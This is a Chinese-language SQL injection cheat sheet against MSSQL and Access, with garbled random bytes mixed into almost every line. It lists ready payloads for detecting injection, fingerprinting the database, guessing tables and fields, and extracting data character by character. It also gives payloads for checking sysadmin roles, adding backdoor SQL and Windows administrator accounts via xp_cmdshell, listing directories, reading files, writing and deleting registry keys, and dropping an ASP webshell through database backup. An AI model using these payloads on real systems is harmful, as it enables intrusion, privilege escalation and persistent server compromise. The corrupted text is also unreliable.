1.判断是否有注入;and 1=1 ;and 1=2 d��vUJk<;w
2.初步判断是否是mssql ;and user>0 Yr0%�Z�YfN
^�6obxwVG
3.注入参数是字符'and [查询条件] and ''=' 0�t�<TZa]V
pfZ��xG�.l
4.搜索时没过滤参数的'and [查询条件] and '%25'=' +p_SKk!%+�
Q"�\�*JV�5
5.判断数据库系统 Iu�nt�!L��
7?F0~[eG�G
;and (select count(*) from sysobjects)>0 mssql O!��;!amvz
4��4cyD _(
;and (select count(*) from msysobjects)>0 access � /y1,w JI
�|)0kv�f?
�xr�����o�
2�vK{�Yw �
6.猜数据库 ;and (select Count(*) from [数据库名])>0 PI�nU�-"gG
�tcm�G>^YM
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �E�5Z��,4B
�?-O�y/Y K
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �>7
4'�g�}
r`mfL�A]d�
9.(1)猜字段的ascii值(access) x!
�Z|�^q
6o
{41@v(
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 _,~��/KJp�
z}kD�:A)a�
(2)猜字段的ascii值(mssql) ``�0knr <�
(L
���q^C=
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #����Z�8<H
�[NyR�$yD{
10.测试权限结构(mssql) ^cX);�k�oO
��%e=BC^VW
m~%IHW�O'�
�{Pdy��KgM
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- J�6=*F;x6E
F~&bg�l[YZ
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- -�3F|)q�wK
��\z���0"
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��~��-|�K5
Bg��U�f:PT
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- )�ASI�41�
����G�i?"�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��h=�?#D0�
:��+Y+5:U]
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- s� [@I�I�]
W�}XDzR'�<
;and 1=(select IS_MEMBER('db_owner'));-- p
0R�)Yc+;
S�9U�`-\L0
i�VwI}%k��
_6xC4@~h*
11.添加mssql和系统的帐户 abx��/h#_q
%Q]m6ciAM�
;exec master.dbo.sp_addlogin username;-- 3)p�#�}_u{
;exec master.dbo.sp_password null,username,password;-- �RCg�Z GP�
?/5WM�%���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �%^kB��cId
���IL*C/�y
;exec master.dbo.xp_cmdshell 'net user username password FU��iEayM
~X)Aw�3�}F
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Z;-=x��p�
|�*K AqTO0
;exec master.dbo.xp_cmdshell 'net user username password /add';-- IP�9mv`�[�
Xu2:yf4No*
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- "�NM�X>a,(
`[�X5mEe�
j�gK��8} C
+��?D�P r�
12.(1)遍历目录 1T�!(M"'Ij
Wz;�7� |UC
;create table dirs(paths varchar(100), id int) \mbm$E+�X
:I[n�A?d[&
;insert dirs exec master.dbo.xp_dirtree 'c:\' �STtj�k�Z6
s�Zx���f.
;and (select top 1 paths from dirs)>0 $!H;�,Jxv
.}=gr+<bf�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) s\@RJ[�(<
Mj2`p#5wKh
�NI,i)OSEN
�E��g$ �I
(2)遍历目录 GHa��D�3�2
�XOe)tz�
L
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ~M �_���@_
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��h�/?$~OD
#�{-B�`FAQ
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 w&8N6gA14
�.hPk}B/KV
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Bi:%}8STH�
]
-iMo4H
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 avxr�|�u�k
FN�0)DN2d}
EhB0w;�c
Kg4\:A7Sa.
13.mssql中的存储过程 bys5IOP{]o
�`#�Z=cq^_
xp_regenumvalues 注册表根键, 子键 ��9E�H�hVi
g3B�%}!|�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 z��ZR_&�z<
p�L�2P�
.�
xp_regread 根键,子键,键值名 =�hL;Q@inb
~XU%�_��Hz
;exec xp_regread J[� ;�g
�\
�&6ded�s
�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �a=�@]O�v/
"Tt5cqUQoY
xp_regwrite 根键,子键, 值名, 值类型, 值 PuO�5@SP~�
]L)l5@5�^�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ?�DJ/Yw>>3
�OYW:I1K<5
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 &UrPb%=�2H
%�La<���]
xp_regdeletevalue 根键,子键,值名 �:�O)\+s-�
q#D�-}R_RN
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 BRSI���g�]
X/�Sp�!W-H
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 [L(qrAQ2|z
^`�i�q�a-1
^jh��c(ZW"
i=3~ h Zl�
14.mssql的backup创建webshell �g�&�&��-
`O,�^oD�4
use model f�(S�9>c2�
�`s8*�n(\h
create table cmd(str image); K4U_sC�h#f
� KEPNe(�H
insert into cmd(str) values (''); �*3@ =X�Y7
FT8<�a }o
backup database model to disk='c:\l.asp'; OKi}�aQ2R*
y$$|_
�l@
S(2�_s,�J^
D�*0[7:NSO
15.mssql内置函数 tEuV��n�5�
Qz�L�E9 ��
;and (select @@version)>0 获得Windows的版本号 �|��-l9�Z�
#|j8vmfn$e
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +,�c]FA�x4
MxLg��8,�M
;and (select user_name())>0 爆当前系统的连接用户
2^w8J �w9
F%�< Z�EVm
;and (select db_name())>0 得到当前连接的数据库 +khVi}����
�.�D3k(z�Z
�'><��I|c}
DMdVE �P"m
16.简洁的webshell tn���38T%�
u7nTk'��#r
use model W�*�;r}!ro
�#=uV�, dw
create table cmd(str image); mswAao<y&x
7?@ ��-�|{
insert into cmd(str) values (''); QtHK`f>4#n
�[z�J|6�1^
backup database model to disk='g:\wwwtest\l.asp';
